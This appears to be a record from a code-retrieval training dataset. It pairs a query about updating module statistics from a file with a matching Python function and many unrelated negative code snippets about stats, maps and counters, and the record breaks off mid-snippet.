_dict_key_to_key(model.nlparms)\n #nlpci_map = _dict_key_to_key(model.nlpcis)\n table_sdamping_map = _dict_key_to_key(model.tables_sdamping)\n dconadd_map = _dict_key_to_key(model.dconadds)\n dconstr_map = _dict_key_to_key(model.dconstrs)\n dessub_map = dconadd_map\n for key, value in dconstr_map.items():\n if key in dessub_map:\n raise NotImplementedError()\n dessub_map[key] = value\n dresp_map = _dict_key_to_key(model.dresps)\n gust_map = _dict_key_to_key(model.gusts)\n trim_map = _dict_key_to_key(model.trims)\n tic_map = _dict_key_to_key(model.tics)\n csschd_map = _dict_key_to_key(model.csschds)\n tranfer_function_map = _dict_key_to_key(model.transfer_functions)\n\n mapper = {\n 'elements' : eid_map,\n 'nodes' : nid_map,\n 'coords' : cid_map,\n 'materials' : mid_map,\n 'properties' : properties_map,\n 'rigid_elements': rigid_elements_map,\n 'spcs' : spc_map,\n 'mpcs' : mpc_map,\n 'METHOD' : method_map,\n 'CMETHOD' : cmethod_map,\n 'FLFACT' : flfact_map,\n 'FMETHOD' : flutter_map,\n 'caeros' : caero_map,\n 'FREQUENCY' : freq_map,\n\n 'DLOAD' : dload_map,\n 'LOAD' : load_map,\n 'LOADSET' : lseq_map,\n 'TSTEP' : tstep_map,\n 'TSTEPNL' : tstepnl_map,\n 'SUPORT1' : suport1_map,\n 'NLPARM' : nlparm_map,\n 'SDAMPING' : table_sdamping_map,\n 'DESSUB' : dessub_map,\n 'DESOBJ' : dresp_map,\n 'GUST' : gust_map,\n 'TRIM' : trim_map,\n 'IC' : tic_map,\n 'CSSCHD' : csschd_map,\n 'TFL' : tranfer_function_map,\n #'DESSUB' : dessub_map,\n # bad...\n 'TEMPERATURE(LOAD)' : temp_map,\n 'TEMPERATURE(INITIAL)' : temp_map,\n #'DATAREC' : datarec_map,\n #'ADAPT' : adapt_map,\n #'SUPER' : super_map,\n #'BOUTPUT' : boutput_map,\n #'OUTRCV' : outrcv_map,\n }\n\n return mapper", "def _predicts(self, Xrow):\n _, row = Xrow\n return self._predicts_target_values(row, None)", "def _predicts(self, Xrow):\n _, row = Xrow\n return self._predicts_target_values(row, None)", "def _predicts(self, Xrow):\n _, row = Xrow\n return self._predicts_target_values(row, None)", "def _predicts(self, Xrow):\n _, row = Xrow\n return self._predicts_target_values(row, None)" ]
[ "0.66845304", "0.62534523", "0.61838084", "0.604524", "0.59644157", "0.5678246", "0.56550837", "0.5597702", "0.5595955", "0.5552257", "0.55398905", "0.54507", "0.54413307", "0.542242", "0.54172045", "0.54105145", "0.5367758", "0.5321824", "0.5305091", "0.5284699", "0.52551997", "0.52550423", "0.52549005", "0.5245833", "0.52254117", "0.5220396", "0.52153003", "0.52046514", "0.5201628", "0.51888216", "0.5177829", "0.5169637", "0.5161584", "0.51350164", "0.5133342", "0.5107604", "0.5106464", "0.5101935", "0.51015544", "0.5098933", "0.50942475", "0.5093606", "0.5087804", "0.50874376", "0.50823057", "0.5081323", "0.50783694", "0.50681627", "0.5063306", "0.505947", "0.50591224", "0.5044728", "0.5024446", "0.5020481", "0.5017457", "0.5010907", "0.5005777", "0.49898392", "0.49883914", "0.498732", "0.49869066", "0.49835944", "0.49815464", "0.49811786", "0.4972871", "0.49710566", "0.49704906", "0.49655855", "0.4963671", "0.49616045", "0.49551028", "0.49529052", "0.4952207", "0.49496162", "0.49479532", "0.49434775", "0.4932023", "0.49205577", "0.49172145", "0.49134913", "0.4912351", "0.49090734", "0.48613766", "0.4859486", "0.4859393", "0.48592788", "0.4851829", "0.48418313", "0.48412114", "0.4840923", "0.48407304", "0.48318064", "0.4831047", "0.48262933", "0.48260072", "0.48240268", "0.4821462", "0.4821462", "0.4821462", "0.4821462" ]
0.77035165
0
Updates stats inside mod_stats_map with data gathered from the file.
def get_file_mod_stats_for_upstream_refs(file_name, mod_stats_map): with open(file_name) as f: lines = f.readlines() upstream_ref = None upstream_start_line = None for line_number, line in enumerate(lines): if REGION_START_TAG in line: tag, ref_name = _extract_tag_and_ref_name_from_line(line, False) if REGION_UPSTREAM_TAG in tag: upstream_ref = ref_name upstream_start_line = line_number elif REGION_END_TAG in line and upstream_ref: mod_stats = mod_stats_map[upstream_ref] mod_stats.mod_count += 1 mod_stats.line_count += line_number - upstream_start_line - 1 upstream_ref = None upstream_start_line = None
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def update_stat_file(self):\n logfile = \"../data/{}_stat.json\".format(self.ID)\n statobj = {\n 'hp': self.hp,\n 'max_hp': MAX_TANK_HP,\n 'ammo': self.ammo,\n 'score': self.score,\n 'age': self.age,\n 'alive': not self.is_dead(),\n 'color': TANK_COLORS[self.color],\n }\n if USE_SIMULATOR:\n js.globals.handle_stat(self.ID, json.dumps(statobj))\n else:\n with open(logfile, 'w') as f:\n f.write(json.dumps(statobj))", "def _file_update(self, filename):\n values = TaskInfo._parse_file(filename)\n self._load_dict(values)", "def update_stats(self):\n modEnum = Mod_Enum()\n self.attack = self.baseAttack + self.get_stat(modEnum.MOD_ATTACK)\n self.defense = self.baseDefense + self.get_stat(modEnum.MOD_DEFENSE)\n self.hp[1] = 100 * ( 1 + self.get_stat(modEnum.MOD_HP) )\n self.absorbtion = self.get_stat(modEnum.MOD_ABSORB)\n self.regen = 0.00 + self.get_stat(modEnum.MOD_REGEN)\n self.lifeLeech = 0.00 + self.get_stat(modEnum.MOD_LEECH)\n self.crit = 0.00 + self.get_stat(modEnum.MOD_CRIT)\n self.attackSpeedMultiplier = 1.0 + self.get_stat(modEnum.MOD_ATTACK_SPEED)\n self.moveSpeedMultiplier = 1.0 + self.get_stat(modEnum.MOD_MOVE_SPEED)\n #cap move speed\n if self.moveSpeedMultiplier > 4.0:\n self.moveSpeedMultiplier = 4.0 + 0.25 * (self.moveSpeedMultiplier - 4.0)\n \n self.speed = self.baseSpeed * self.moveSpeedMultiplier", "def readPlayerFileAndFillStats(players_data_filename, game_stats):\n\tplayer_stats = {}\n\tteam_stats = {}\n\tgame_stats_clean = {}\n\tgame_stats = fillGameStats(players_data_filename, game_stats)\n\n\twith open(players_data_filename) as csvfile:\n\t reader = csv.DictReader(csvfile)\n\t for row in reader:\n\t \tgame_id = row['game_id']\n\n\t \tif isGameStatsValid(game_stats[game_id]):\n\t\t \tplayer_id = row['player_id']\n\t\t \tteam_id = row['team_id']\n\t\t \tkills = row['kill']\n\t\t \tdeaths = row['death']\n\t\t \tassists = row['assists']\n\t\t \tgold = row['gold_earned']\n\n\t\t \tif not game_stats.get(game_id):\n\t\t \t\tprint('no game id')\n\n\t\t \tkills = int(kills)\n\t\t \tdeaths = int(deaths)\n\t\t \tassists = int(assists)\n\t\t \tgold = int(gold)\n\n\t\t \tif not game_stats_clean.get(game_id):\n\t \t\t\tgame_stats_clean[game_id] = game_stats[game_id]\n\n\t\t \twin = 0\n\t\t \tif game_stats[game_id]['winner_team_id'] == team_id:\n\t\t \t\twin = 1\n\t\t \t\n\n\t\t \tif not team_stats.get(team_id):\n\t \t\t\tteam_stats[team_id] = {'games_played': 1, 'wins': 0, 'loses': 0, 'kills': 0, 'deaths': 0, 'assists': 0, 'gold': 0, 'player_ids': Set([]), 'game_ids': Set([]), 'player_stats': []}\n\t \t\t\n\t \t\tteam_stats[team_id]['wins'] += win/5\n\t \t\tteam_stats[team_id]['loses'] += (1 - win)/5\n\t\t \tteam_stats[team_id]['kills'] += kills\n\t\t \tteam_stats[team_id]['deaths'] += deaths\n\t\t \tteam_stats[team_id]['assists'] += assists\n\t\t \tteam_stats[team_id]['gold'] += gold\n\t\t \tteam_stats[team_id]['player_ids'].add(player_id)\n\t\t \tteam_stats[team_id]['game_ids'].add(game_id)\n\t\t \tteam_stats[team_id]['games_played'] = len(team_stats[team_id]['game_ids'])\n\n\n\t\t \tif not player_stats.get(player_id):\n\t\t \t\tplayer_stats[player_id] = {'games_played': 1, 'wins': win, 'loses': 1 - win, 'kills': kills, 'deaths': deaths, 'assists': assists, 'gold': gold, 'team_ids': Set([team_id])}\n\t\t \telse:\n\t\t \t\tplayer_stats[player_id]['games_played'] += 1\n\t\t \t\tplayer_stats[player_id]['wins'] += win\n\t\t \t\tplayer_stats[player_id]['loses'] += 1 - win\n\t\t \t\tplayer_stats[player_id]['kills'] += kills\n\t\t \t\tplayer_stats[player_id]['deaths'] += deaths\n\t\t \t\tplayer_stats[player_id]['assists'] += assists\n\t\t \t\tplayer_stats[player_id]['gold'] += gold\n\t\t \t\tplayer_stats[player_id]['team_ids'].add(team_id)\n\n\t\t \t#team_stats[team_id]['player_stats'].append({player_id: player_stats[player_id]})\n\n\treturn game_stats_clean, team_stats, player_stats", "def update_stats():\r\n\turl = \"https://www.pathofexile.com/\" + \"api/trade/data/stats\"\r\n\tsave_path = \"data/stats.json\"\r\n\tr = requests.get(url)\r\n\twith open(save_path, \"w\") as fileID:\r\n\t\tfileID.write(r.text)", "def UpdateFile(self, modID = None):\n if modID is None:\n modID = self.modActive\n\n source = self.modules[modID][1]\n filename = self.modules[modID][2]\n\n try:\n file = open(filename, \"wt\")\n file.write(source)\n finally:\n file.close()", "def updateFileData(self):\n with open(pagePath(self.pageName)) as f:\n self.fileData = f.read()\n self.lastUpdated = time.time()", "def __collect_stats(self, encode, file_name):\n if encode not in self.__hash.keys():\n self.__hash[encode] = []\n self.__hash[encode].append(file_name)\n self.__files_count += 1\n with open(file_name, 'r', encoding=encode) as fr:\n for line in fr:\n self.__lines += 1\n self.__chars += len(line)", "def update_status(self):\n\n # Memory information can be found in status and statm /proc/PID files\n # status file VmRSS equivalent to top's RES column\n # statm disagrees with status VmRSS, I think it may not include\n # sub-processes\n # From: man proc\n # * VmPeak: Peak virtual memory size.\n # * VmSize: Virtual memory size.\n # * VmHWM: Peak resident set size (\"high water mark\").\n # * VmRSS: Resident set size.\n\n # status_fields should be ordered as in the status file\n fields = iter(self.status_fields)\n field = next(fields)\n with open(self.status_path) as f:\n for line in f:\n if line.startswith(field):\n # separated by white-space, 2nd element is value\n # 3rd is units e.g. kB\n # At the moment all fields are ints\n self.status[field] = int(line.split()[1])\n\n try:\n field = next(fields)\n except StopIteration:\n # Just found the last field in status_fields\n break", "def update(self):\n try:\n with open(self._file_path, encoding=\"utf-8\") as file_data:\n for line in file_data:\n data = line\n data = data.strip()\n except (IndexError, FileNotFoundError, IsADirectoryError, UnboundLocalError):\n _LOGGER.warning(\n \"File or data not present at the moment: %s\",\n os.path.basename(self._file_path),\n )\n return\n\n if self._val_tpl is not None:\n self._state = self._val_tpl.async_render_with_possible_json_value(\n data, None\n )\n else:\n self._state = data", "def loadMetaChunkToServerMap (fileName):\n if not os.path.exists(fileName):\n print \"File \", fileName, \" does not exists\"\n sys.exit(1)\n\n infile = open (fileName, \"r\")\n count = 0\n while infile:\n count = count + 1\n line = infile.readline()\n if not line:\n break\n print \"DEBUGME : processing line %s, %d\" % (line, count)\n lineParts = line.split(' ')\n gChunkMap[lineParts[0]] = ChunkInfo(lineParts[0], lineParts[1], lineParts[2])\n # Add a ChunkHostInfo\n numServers = int(lineParts[2])\n for i in range(numServers):\n i = i * 3\n gChunkMap[lineParts[0]].addChunkHostInfo(ChunkHostInfo(lineParts[i+3], lineParts[i+4], lineParts[i+5]))", "def update_stats():\n list_db = get_list_database()\n\n list_db.group_stats_force_update()\n transaction_commit(None, 'GroupStatsUpdate')\n\n list_db.user_stats_force_update()\n transaction_commit(None, 'UserStatsUpdate')", "def map(item):\n user_services.update_dashboard_stats_log(item.id)", "def _update_base_stats(self, base_stats):\n self.total_samples += base_stats[\"sample_size\"]\n self.sample = base_stats[\"sample\"]\n self._empty_line_count += base_stats[\"empty_line_count\"]\n self.memory_size += base_stats[\"memory_size\"]", "def stats(self, file, **options):\n\n options['file'] = file\n\n return self._get('stats', **options)", "def load_stats():\n assert isinstance(settings.PARS['numBases'], int)\n assert isinstance(settings.PARS['dataset'], str)\n\n stat_filename = 'stat_{}_{}.json'.format(\n settings.PARS['numBases'], settings.PARS['dataset'])\n stat_full_path = os.path.join(settings.GENERATED_DATA_DIRECTORY, stat_filename)\n\n with open(stat_full_path, 'r') as file_:\n fobj_avg = json.load(file_)\n\n fobj_avg = {int(k): v for k, v in fobj_avg.items()}\n\n return fobj_avg", "def update_statistics(status):\n if not os.path.isfile(CONFIG['stats_file']):\n current_stats = {}\n else:\n current_stats = json.loads(open(CONFIG['stats_file'], 'r').read())\n # current_stats = delete_old_statistics(current_stats)\n\n current_key = int(datetime.datetime.now().strftime('%Y%m%d%H%M'))\n for host, state in ((h['host'], h['status']) for h in status):\n if host not in current_stats:\n current_stats[host] = {}\n\n # get newest entry of host\n newest_state = None, None\n for key, entry in current_stats[host].items():\n if newest_state[0] is None or int(key) > int(newest_state[0]):\n newest_state = key, entry\n if newest_state[1] != state:\n # state has changed. Write it.\n current_stats[host][current_key] = state\n\n # write stats\n open(CONFIG['stats_file'], 'w').write(json.dumps(current_stats))", "def refreshMTimes(self):\n del self.mtimesReset[:]\n for fileName, fileInfo in self.data.items():\n oldMTime = self.mtimes.get(fileName,fileInfo.mtime)\n self.mtimes[fileName] = oldMTime\n #--Reset mtime?\n if fileInfo.mtime != oldMTime and oldMTime != -1:\n fileInfo.setMTime(oldMTime)\n self.mtimesReset.append(fileName)", "def load_from_file(self, file):\n\n if (args.replacetopip): #create list of IP addresses and the number of times they occur\n with open(args.dirty) as dirty_file:\n for line in dirty_file:\n ip = self._extract_by_key(line, self._attr_key)\n if (self.ip_dict.has_key(ip)):\n self.ip_dict[ip] += 1\n else:\n self.ip_dict[ip] = 1\n #sort list\n self.top_ip = sorted(self.ip_dict.items(), key=operator.itemgetter(1), reverse=True)\n count = 0\n with open(file) as ip_file:\n for line in ip_file:\n if (args.replacetopip): #replace top IP addresses from the sorted list with new ones from the file\n ip_old = self.top_ip[count][0]\n ip_new = line.strip()\n count += 1\n else:\n ip_old,ip_new = line.split(\",\")\n self._insts[ip_old] = ip_new.strip()", "def fromfile(self,file):\n self.d.update(params_file(file))", "def update_stats(self, idx, key):\n\n stats = self.stats\n if not stats.has_key(idx):\n stats[idx] = {}\n if stats[idx].has_key(key):\n stats[idx][key] += 1\n else:\n stats[idx][key] = 1", "def stats(self, stats):\n self._stats = stats", "def map_file(self, map_file):\n\n self._map_file = map_file", "def get_member_stats(self):\n self.mstats = {}\n # add in members from expanded_def (which includes any merges)\n for qid in self.expanded_def.keys():\n # check for trailing quantity specifier (!, *, +, ?). Not for name space.\n # ! - required (default), * - 0 or more, + - 1 or more, ? - 0 or 1\n id, qty = self.file.parse_qty(qid, \"!\")\n if id in self.mstats.keys():\n print \"** Error, duplicate (%s) id in group\" % id\n traceback.print_stack()\n sys.exit(1)\n type = 'group' if id.endswith('/') else 'dataset'\n self.mstats[id] = { 'ns': self.sdef['ns'], 'qty': qty,\n 'df': self.expanded_def[qid], 'created': [], 'type': type }\n # add in members from any includes\n # print \"** processing includes\"\n for qidq in self.includes:\n qid, qty = self.file.parse_qty(qidq, \"!\")\n # print \"processing include\", qid\n sdef = self.file.get_sdef(qid, self.sdef['ns'], \"Referenced in include\")\n # print \"obtained sdef:\"\n # pp.pprint(sdef)\n modifiers = self.includes[qidq]\n if len(modifiers) > 0:\n # need to incorporate modifications to definition of included child members\n df = copy.deepcopy(sdef['df'])\n # self.modify(df, modifiers)\n self.merge(df, modifiers) # merges modifiers into definition\n # print \"df after merging modifiers:\"\n else:\n df = sdef['df']\n # print \"df after copy:\"\n id = sdef['id']\n type = sdef['type']\n # pp.pprint(df)\n # qty = '!' # assume includes are required\n if id in self.mstats.keys():\n print \"** Error, duplicate (%s) id in group, referenced by include\" % id\n traceback.print_stack()\n sys.exit(1)\n self.mstats[id] = { 'ns': self.sdef['ns'], 'qty': qty,\n 'df': df, 'created': [], 'type': type }\n # print \"after processing all includes, mstats is:\"\n # pp.pprint(self.mstats)", "def load_stats(self, result, **kwargs):\n p_stat = result.get('player_stats').get('stats')\n if not p_stat:\n raise ValueError('No stats for player')\n stat_list = p_stat.get('stat')\n for item in stat_list:\n key = item.get('stat_id')\n value = int(item.get('value'))\n self.stat_data[key] = value", "def loadRatingScoreMappingFromFile(file):\n\treturn \\\n\tcompose(\n\t\tdict\n\t , partial(map, lambda line: ((line[0], line[1]), line[2]))\n\t , partial(takewhile, lambda line: len(line) > 2 and line[0] != '')\n\t , lambda t: t[1]\n\t , lambda lines: (pop(lines), lines)\n\t , fileToLines\n \t , partial(join, getDataDirectory())\n\t)(file)", "def updateRequestStats(self, request, stats):\n # this stats dict will be validated on the server side\n self.updateRequestProperty(request, stats)", "def update_freq_dist(filename):\r\n pass", "def updateAll(data):\n if (data.updatePositions):\n data.groups.player.update(data)\n data.groups.projectiles.update(data)\n data.groups.monsters.update(data)\n data.groups.spawners.update(data)", "def update_from_file(self, filename):\n ns = {}\n with open(filename) as handle:\n code = compile(handle.read(), filename, 'exec')\n exec(code, ns)\n values = {\n key: value\n for key, value in ns.items()\n if not key.startswith('_')\n }\n self.__dict__.update(values)", "def _update_counters(self, filepath, step):\n\n counters = {}\n\n # Load\n if os.path.exists(self.counters_file):\n with open(self.counters_file) as f:\n counters = json.load(f)\n\n counters[filepath] = dict(step=step)\n\n # Save\n with open(self.counters_file, \"w\") as f:\n json.dump(counters, f, indent=4)", "def update_stats(self):\n\n self.raw_data_index = 0\n start_time = time.time()\n data_frame = load_data(self.selections)\n user_stats = get_user_stats(data_frame)\n\n self.time_stats_data.config(text=get_time_stats(data_frame))\n self.station_stats_data.config(text=get_station_stats(data_frame))\n self.trip_stats_data.config(text=get_trip_duration_stats(data_frame))\n\n self.user_stats_data.config(text=user_stats[0])\n self.gender_stats_data.config(text=user_stats[1])\n self.age_stats_data.config(text=user_stats[2])\n self.status.config(\n text=f\"Updated statistics in {round((time.time() - start_time), 2)} seconds. Modify filters using left radio buttons as desired...\"\n )", "def load_data_map(self):\n with open(\"map/maps.txt\") as maps:\n for x_axis, line in enumerate(maps):\n self.x_axis = x_axis\n self.full_map.insert(x_axis, [])\n for y_axis, case in enumerate(line.strip()):\n self.y_axis = y_axis\n if case == \"D\":\n self.full_map[x_axis].insert(y_axis, \"M\")\n self.user.position = (x_axis, y_axis)\n elif case == \"A\":\n self.full_map[x_axis].insert(y_axis, \"A\")\n elif case == \"_\":\n self.full_map[x_axis].insert(y_axis, \"_\")\n elif case == \"#\":\n self.full_map[x_axis].insert(y_axis, \"#\")", "def update_map(mapping, map_file):\n #Replace commas in mapping string with newlines\n mapping = mapping.replace(',', '\\n')\n\n try:\n with open(map_file, 'w') as f:\n f.write(mapping)\n except IOError as e:\n logging.error(\"Can not write %s\", map_file)\n logging.error(e)", "def stats(self, stats):\n\n self._stats = stats", "def update_data(self, url, file_name):\n if file_name == 'upcoming':\n r = self.gosu\n # Thread(target=self.update_upcoming_matches_teams, args=(r,)).start()\n else:\n r = requests.get(url)\n r = r.json()\n with open('files/' + file_name + '.json', 'w') as f:\n json.dump(r, f, indent=4)\n with open('files/' + file_name + '.txt', 'w') as f_: # update date\n f_.write(str(time.time()))", "def _update_offset_file(self):\n if self.on_update:\n self.on_update()\n offset = self._filehandle().tell()\n inode = stat(self.filename).st_ino\n fh = open(self._offset_file, \"w\")\n fh.write(\"%s\\n%s\\n\" % (inode, offset))\n fh.close()\n self._since_update = 0", "def statistics_update(self, node, population, size, mtime, cluster=0):\n\n qs = (\"select population, size from statistics \"\n \"where node = ? and cluster = ?\")\n qu = (\"insert or replace into statistics \"\n \"(node, population, size, mtime, cluster) \"\n \"values (?, ?, ?, ?, ?)\")\n self.execute(qs, (node, cluster))\n r = self.fetchone()\n if r is None:\n prepopulation, presize = (0, 0)\n else:\n prepopulation, presize = r\n population += prepopulation\n population = max(population, 0)\n size += presize\n self.execute(qu, (node, population, size, mtime, cluster))", "def update_file2(infile,outfile,energy_dict,mat):\n\n with open(infile,'r+') as f:\n with open(outfile,'w+') as of:\n matfile = \"{} {}\".format(mat,2151)\n for line in f:\n #if(we're in file 2: res's)\n if(matfile in line):\n for ekey in energy_dict:\n #if( we find the res )\n if ekey in line:\n linelist = list(line)\n for i,channel_pair in enumerate(energy_dict[ekey]):\n channel_number = channel_pair[0]\n channel_value = channel_pair[1]\n start = 11*channel_number\n end = 11+start\n linelist[start:end] = endf_float_str(channel_value)\n line = \"\".join(linelist)\n of.write(line)", "def _update_database_map(self, path):\n if path:\n filename = path + '/APD_MAP.txt'\n else:\n filename = 'APD_MAP.txt'\n filepointer = open(filename, 'w')\n for invariom, molecule in self.map.items():\n filepointer.write(invariom + ':' + molecule + '\\n')\n filepointer.close()", "def _update_stat_json(self, stat_name):\n\n pass", "def update_stats(self, health_message):\n session = db_api.get_session()\n\n amphora_id = health_message['id']\n listeners = health_message['listeners']\n for listener_id, listener in listeners.items():\n\n stats = listener.get('stats')\n stats = {'bytes_in': stats['rx'], 'bytes_out': stats['tx'],\n 'active_connections': stats['conns'],\n 'total_connections': stats['totconns'],\n 'request_errors': stats['ereq']}\n LOG.debug(\"Updating listener stats in db and sending event.\")\n LOG.debug(\"Listener %s / Amphora %s stats: %s\",\n listener_id, amphora_id, stats)\n self.listener_stats_repo.replace(\n session, listener_id, amphora_id, **stats)\n\n listener_stats = self.get_listener_stats(session, listener_id)\n self.emit(\n 'listener_stats', listener_id, listener_stats.get_stats())\n\n listener_db = self.repo_listener.get(session, id=listener_id)\n lb_stats = self.get_loadbalancer_stats(\n session, listener_db.load_balancer_id)\n self.emit('loadbalancer_stats',\n listener_db.load_balancer_id, lb_stats.get_stats())", "def update(self, namein, nameout):\n\t\ttext = self.dict.sub(self.readFile(namein))\n\t\tself.writeFile(nameout, text)\n\t\treturn", "def process_file(self, data, filename):\n\n if data:\n data = self.update_province_info(data)\n self.get_province_info(data, filename)", "def load_map(self, filename, player=None):\n\n # Close out any old map we have\n self.close_world()\n\n # Now load the new one\n # TODO: check for exceptions, etc.\n (self.world, self.worlddf) = StarboundData.open_world(filename)\n\n if self.world:\n base_filename = os.path.basename(filename)\n self.loaded_filename = filename\n self.set_title()\n if self.world.info.coords:\n self.data_table.set_world_coords(*self.world.info.coords[:2])\n else:\n self.data_table.clear_world_coords()\n self.data_table.set_world_size(*self.world.info.size)\n # We're duplicating some work from Player.get_worlds() here, but\n # consolidating everything would be tricky, and in the end I\n # figured it wouldn't be worth it.\n match = re.match(r'(.*)-([0-9a-f]{32})-(\\d+).(temp)?world', base_filename)\n if match:\n self.data_table.set_world_name(match.group(1))\n self.data_table.set_world_type('Non-Planet System Object')\n self.data_table.set_world_extra('')\n elif filename.endswith('.shipworld'):\n self.data_table.set_world_name('Starship')\n self.data_table.set_world_type('Your Starship')\n self.data_table.set_world_extra('')\n elif self.world.info.name:\n self.data_table.set_world_name(StarboundData.strip_colors(self.world.info.name))\n self.data_table.set_world_type(self.world.info.description)\n self.data_table.set_world_extra(', '.join(self.world.info.world_biomes))\n else:\n self.data_table.set_world_name(base_filename)\n self.data_table.set_world_type('Unknown')\n self.data_table.set_world_extra('')\n self.scene.load_map(self.world)\n\n # Jump to a Mech Beacon, if we have it\n if self.world.get_entity_uuid_coords('mechbeacon') != None:\n self.add_navigation_item('mechbeacon', 'Go to Mech Beacon')\n\n # Update our player-dependent navigation menu actions\n if player:\n\n # Current Player Location\n if player.cur_world_filename and player.cur_world_filename == base_filename:\n self.navigation_actions.append(\n self.navmenu.addAction(\n 'Go to Player Location ({:d}, {:d})'.format(*map(int, player.cur_world_loc)),\n lambda: self.action_to_coords(*player.cur_world_loc),\n ))\n\n # Player Bookmarks\n if base_filename in player.bookmarks:\n marks = player.bookmarks[base_filename]\n for mark in sorted(marks):\n self.add_navigation_item(mark.uuid, 'Go to Bookmark: {}'.format(mark.name))\n else:\n # TODO: Handle this better, too.\n raise Exception('World not found')\n\n # Update menu state, potentially\n self.enforce_menu_state()", "def callback_UpdateMap(cm, mod_units, window):\n for mod in mod_units:\n # Boost is not implemented yet, just a potential way to link different\n # bioprocesses together via sideFlows.\n # Ex) swtichgrass as a source of extra cellulose\n\n if mod[0:5] != 'boost':\n # Updates a mod of the window . . .\n window[mod].update(cm[mod]['name'])\n\n return None", "def enter_dict(update_dict, path=\"current_request.txt\"):\n\n request_dict = RequestFileCom.file_to_dict(path)\n\n # Make sure no one changes the file content before finishes to update it.\n RequestFileCom.mutex.acquire()\n\n for key in update_dict:\n\n request_dict[key] = update_dict[key]\n\n request_file_string = \"\"\n\n for key in request_dict:\n\n request_file_string += key + \"::\" + request_dict[key] + \"\\n\"\n\n # Update the file.\n with open(path, \"w\") as f:\n\n f.write(request_file_string)\n\n RequestFileCom.mutex.release()\n\n request_dict = RequestFileCom.file_to_dict(path)", "def parse_user_mod(path):\n mod = np.loadtxt(path, delimiter=',')\n return {'vs': np.append(mod[:, 0], 100), 'hl': mod[:, 1]}", "def update_calculated_stats(self, player_data):\n # Updates calculated statistics\n fga = player_data['FGA']\n fgm = player_data['FGM']\n pa3 = player_data['3FGA']\n pm3 = player_data['3FGM']\n try:\n player_data['FG%'] = fgm/fga\n except:\n player_data['FG%'] = 0.0\n try:\n player_data['3FG%'] = pm3/pa3\n except:\n player_data['3FG%'] = 0.0\n return(player_data)", "def update_field_stats(self, tweet):\n\n stats = self.stats\n for f in self.tweet_fields:\n if tweet.has_key(f):\n f_val = tweet[f]\n if f_val is None:\n continue\n if stats[f].has_key(f_val):\n stats[f][f_val] += 1\n else:\n stats[f][f_val] = 1", "def test_load_stats(self):\n data = {'a': 'b'}\n stats_file = self._write('stats.json', data)\n settings = {\n 'webpack.stats_file': stats_file,\n }\n state = WebpackState(settings)\n stats = state.load_stats()\n self.assertEqual(stats, data)", "def update_maps(self, meta_config):\n with open(meta_config, 'r') as configs:\n assert configs.readline().strip('\\r\\n') == METACONF_FLAG # Check/skip the multi-map flag\n for map_config in re.split('[\\\\r\\\\n]+', configs.read()):\n\n # If it's a blank line, ignore it\n if map_config == '':\n continue\n\n map_name = Config.initConf(map_config).get('DEFAULT', 'dataset')\n\n # If the name of a map isn't in map_services, initialize it\n if map_name not in self.map_services.keys():\n map_service = Map(map_config)\n self.map_services[map_service.name] = map_service\n\n # If the config file has been updated, start a new MapService for it\n if os.path.getmtime(map_config) != self.map_services[map_name].last_update:\n self.map_services[map_name] = Map(map_config)\n\n # indicate that map_services has been updated\n self.map_services['_last_update'] = os.path.getmtime(meta_config)", "def get_adjusted_stat_data(loc, stat_code):\n stat_data = {\"000\": None, \"090\": None, \"ver\": None, \"t\": None, \"name\": None}\n g = 981.0 # cm/s^2\n stat_data[\"000\"], num_pts, dt, shift = readGP(loc, \".\".join([stat_code, \"000\"]))\n stat_data[\"090\"], num_pts, dt, shift = readGP(loc, \".\".join([stat_code, \"090\"]))\n stat_data[\"ver\"], num_pts, dt, shift = readGP(loc, \".\".join([stat_code, \"ver\"]))\n\n stat_data[\"000\"], num_pts, dt = adjust_for_time_delay(stat_data[\"000\"], dt, shift)\n stat_data[\"090\"], num_pts, dt = adjust_for_time_delay(stat_data[\"090\"], dt, shift)\n stat_data[\"ver\"], num_pts, dt = adjust_for_time_delay(stat_data[\"ver\"], dt, shift)\n\n t = np.arange(num_pts) * dt\n stat_data[\"t\"] = t\n\n stat_data[\"name\"] = stat_code\n return stat_data", "def update_stats(self, datastruct):\n counter = datastruct.counter\n stats_dict = datastruct.compute_stats()\n if counter == 0:\n self.box1.addstr(5, 2, self.STATS_INIT)\n else:\n self.box1.move(2, 1)\n self.box1.clrtobot()\n self.box1.box()\n if datastruct.last_hits == 0:\n self.box1.addstr(5, 2, self.STATS_SECTION0 + str(datastruct.counter))\n self.box1.addstr(8, 2, self.STATS_NOTRAFFIC)\n else:\n self.box1.addstr(5, 2, self.STATS_SECTION0 + str(datastruct.counter))\n self.box1.addstr(8, 2, self.STATS_SECTION1 + str(datastruct.last_hits))\n self.box1.addstr(11, 2, self.STATS_SECTION2)\n for index, (section, hits) in enumerate(stats_dict[\"top_sections\"]):\n self.box1.addstr(13+2*index, 4, str(index + 1) + \".\" + section + \":\" + str(hits))\n self.box1.addstr(20, 2, self.STATS_SECTION3)\n for index, (user, hits) in enumerate(stats_dict[\"top_users\"]):\n self.box1.addstr(22+2*index, 4, str(index + 1) + \".\" + user + \":\" + str(hits))\n self.box1.addstr(29, 2, self.STATS_SECTION4)\n for index, (error, hits) in enumerate(stats_dict[\"errors\"]):\n self.box1.addstr(31+2*index, 4, str(index + 1) + \".\" + error + \":\" + str(hits))\n self.box1.addstr(38, 2, self.STATS_SECTION5 + str(datastruct.last_traffic))\n self._refresh_screen()", "def updateCounts(self):\n found = False\n fileName = \"counts\"\n if not os.access(fileName, os.F_OK):\n try:\n TFH = open(fileName, \"w\")\n TFH.close()\n except IOError as inst: # @UnusedVariable\n self.logIt(__name__ + \".updateCounts(): Unable to open \" + fileName + \" for write.\" + \" => \" + str(\n inst.errno) + \":\" + str(inst.strerror) + \"\\n\")\n raise\n\n self.logIt(__name__ + \".updateCounts(): fileName=\" + fileName + \"\\n\")\n try:\n FH = open(fileName, \"rb+\")\n # FH = posixfile.open(fileName, \"rb+\") # posixfile has been deprecated.\n # FH.lock('w|')\n data = None\n while 1:\n data = str(FH.readline())\n if data is None or data == \"\": break\n data = re.sub(\"\\n\", \"\", data)\n self.debug(__name__ + \".updateCounts(): data is \" + str(data) + \"\\n\")\n ms = str(self.msgNum) + \"=\"\n self.debug(__name__ + \".updateCounts(): ms is\" + str(ms) + \"\\n\")\n if re.search(ms, data):\n found = True\n self.debug(__name__ + \".updateCounts(): DEBUG0.5\\n\")\n break\n self.debug(__name__ + \".updateCounts(): DEBUG1\\n\")\n if data and found:\n self.debug(__name__ + \".updateCounts(): DEBUG2\\n\")\n eloc = FH.tell()\n self.debug(__name__ + \".updateCounts(): 